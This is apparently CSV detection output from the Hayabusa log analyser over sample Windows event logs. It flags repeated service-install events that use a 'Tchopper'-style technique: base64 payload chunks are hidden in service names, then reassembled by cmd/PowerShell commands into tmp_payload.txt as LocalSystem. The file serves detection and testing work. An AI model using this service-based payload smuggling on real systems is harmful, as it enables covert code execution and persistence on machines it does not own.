2021-11-03 17:17:55.362 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgQXBwbGljYXRpb24gRXZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRBcHBsaWNhdGlvbk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:55.362 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgQXBwbGljYXRpb24gRXZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRBcHBsaWNhdGlvbk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:55.362 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgQXBwbGljYXRpb24gRXZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRBcHBsaWNhdGlvbk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:56.815 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: luZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBBcHBsaWNhdGlvbiAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkQXBwbGljYXRpb25FUFMgPSAkQXBwbGljYXRpb25JbmZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:56.815 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: luZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBBcHBsaWNhdGlvbiAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkQXBwbGljYXRpb25FUFMgPSAkQXBwbGljYXRpb25JbmZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:56.815 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: luZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBBcHBsaWNhdGlvbiAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkQXBwbGljYXRpb25FUFMgPSAkQXBwbGljYXRpb25JbmZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:58.263 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: LkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lID0gJEFwcGxpY2F0aW9uSW5mby5TdGFydFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkxhc3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:58.263 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: LkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lID0gJEFwcGxpY2F0aW9uSW5mby5TdGFydFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkxhc3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:58.263 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: LkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lID0gJEFwcGxpY2F0aW9uSW5mby5TdGFydFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkxhc3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:59.742 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RFdmVudFRpbWUgPSAkQXBwbGljYXRpb25JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzID0gJEFwcGxpY2F0aW9uSW5mby5Ub3RhbEV2ZW50cw0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:59.742 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RFdmVudFRpbWUgPSAkQXBwbGljYXRpb25JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzID0gJEFwcGxpY2F0aW9uSW5mby5Ub3RhbEV2ZW50cw0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:59.742 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RFdmVudFRpbWUgPSAkQXBwbGljYXRpb25JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzID0gJEFwcGxpY2F0aW9uSW5mby5Ub3RhbEV2ZW50cw0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:01.196 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgICAgJEFwcGxpY2F0aW9uRXZlbnRMb2dTaXplID0gJEFwcGxpY2F0aW9uSW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU2VjdXJpdHkgRX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:01.196 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgJEFwcGxpY2F0aW9uRXZlbnRMb2dTaXplID0gJEFwcGxpY2F0aW9uSW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU2VjdXJpdHkgRX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:01.196 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgJEFwcGxpY2F0aW9uRXZlbnRMb2dTaXplID0gJEFwcGxpY2F0aW9uSW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU2VjdXJpdHkgRX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:02.650 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRTZWN1cml0eUluZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBTZWN1cml0eSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:02.650 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRTZWN1cml0eUluZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBTZWN1cml0eSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:02.650 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRTZWN1cml0eUluZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBTZWN1cml0eSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:04.105 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: U2VjdXJpdHlFUFMgPSAkU2VjdXJpdHlJbmZvLkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRTZWN1cml0eUZpcnN0RXZlbnRUaW1lID0gJFNlY3VyaXR5SW5mby5TdGFydFRpbWUNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:04.105 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: U2VjdXJpdHlFUFMgPSAkU2VjdXJpdHlJbmZvLkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRTZWN1cml0eUZpcnN0RXZlbnRUaW1lID0gJFNlY3VyaXR5SW5mby5TdGFydFRpbWUNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:04.105 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: U2VjdXJpdHlFUFMgPSAkU2VjdXJpdHlJbmZvLkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRTZWN1cml0eUZpcnN0RXZlbnRUaW1lID0gJFNlY3VyaXR5SW5mby5TdGFydFRpbWUNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:05.542 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICRTZWN1cml0eUxhc3RFdmVudFRpbWUgPSAkU2VjdXJpdHlJbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTZWN1cml0eVRvdGFsRXZlbnRzID0gJFNlY3VyaXR5SW5mby5Ub3RhbEV2ZW50 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:05.542 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICRTZWN1cml0eUxhc3RFdmVudFRpbWUgPSAkU2VjdXJpdHlJbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTZWN1cml0eVRvdGFsRXZlbnRzID0gJFNlY3VyaXR5SW5mby5Ub3RhbEV2ZW50 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:05.542 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICRTZWN1cml0eUxhc3RFdmVudFRpbWUgPSAkU2VjdXJpdHlJbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTZWN1cml0eVRvdGFsRXZlbnRzID0gJFNlY3VyaXR5SW5mby5Ub3RhbEV2ZW50 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:06.982 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: cw0KICAgICAgICAgICAgJFNlY3VyaXR5RXZlbnRMb2dTaXplID0gJFNlY3VyaXR5SW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU3lzdGVtIE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:06.982 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cw0KICAgICAgICAgICAgJFNlY3VyaXR5RXZlbnRMb2dTaXplID0gJFNlY3VyaXR5SW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU3lzdGVtIE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:06.982 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cw0KICAgICAgICAgICAgJFNlY3VyaXR5RXZlbnRMb2dTaXplID0gJFNlY3VyaXR5SW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU3lzdGVtIE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:08.440 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: V2ZW50IGxvZyBpbmZvDQogICAgICAgICAgICAkU3lzdGVtSW5mbyA9IEdldC1FdmVudExvZ0luZm8gJENvbXB1dGVyIFN5c3RlbSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:08.440 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: V2ZW50IGxvZyBpbmZvDQogICAgICAgICAgICAkU3lzdGVtSW5mbyA9IEdldC1FdmVudExvZ0luZm8gJENvbXB1dGVyIFN5c3RlbSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:08.440 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: V2ZW50IGxvZyBpbmZvDQogICAgICAgICAgICAkU3lzdGVtSW5mbyA9IEdldC1FdmVudExvZ0luZm8gJENvbXB1dGVyIFN5c3RlbSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:09.909 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: dGVtRVBTID0gJFN5c3RlbUluZm8uQXZlcmFnZUV2ZW50cw0KICAgICAgICAgICAgJFN5c3RlbUZpcnN0RXZlbnRUaW1lID0gJFN5c3RlbUluZm8uU3RhcnRUaW1lDQogICAgICAgICAgICAkU3lzdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:09.909 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGVtRVBTID0gJFN5c3RlbUluZm8uQXZlcmFnZUV2ZW50cw0KICAgICAgICAgICAgJFN5c3RlbUZpcnN0RXZlbnRUaW1lID0gJFN5c3RlbUluZm8uU3RhcnRUaW1lDQogICAgICAgICAgICAkU3lzdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:09.909 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGVtRVBTID0gJFN5c3RlbUluZm8uQXZlcmFnZUV2ZW50cw0KICAgICAgICAgICAgJFN5c3RlbUZpcnN0RXZlbnRUaW1lID0gJFN5c3RlbUluZm8uU3RhcnRUaW1lDQogICAgICAgICAgICAkU3lzdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:11.349 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: VtTGFzdEV2ZW50VGltZSA9ICRTeXN0ZW1JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTeXN0ZW1Ub3RhbEV2ZW50cyA9ICRTeXN0ZW1JbmZvLlRvdGFsRXZlbnRzDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:11.349 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VtTGFzdEV2ZW50VGltZSA9ICRTeXN0ZW1JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTeXN0ZW1Ub3RhbEV2ZW50cyA9ICRTeXN0ZW1JbmZvLlRvdGFsRXZlbnRzDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:11.349 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VtTGFzdEV2ZW50VGltZSA9ICRTeXN0ZW1JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTeXN0ZW1Ub3RhbEV2ZW50cyA9ICRTeXN0ZW1JbmZvLlRvdGFsRXZlbnRzDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:12.786 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: dGVtRXZlbnRMb2dTaXplID0gJFN5c3RlbUluZm8uTG9nU2l6ZQ0KDQoNCiAgICAgICAgICAgICRUb3RhbEVQUyA9IFttYXRoXTo6Um91bmQoKCRBcHBsaWNhdGlvbkVQUyArICRTZWN1cml0eUVQUy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
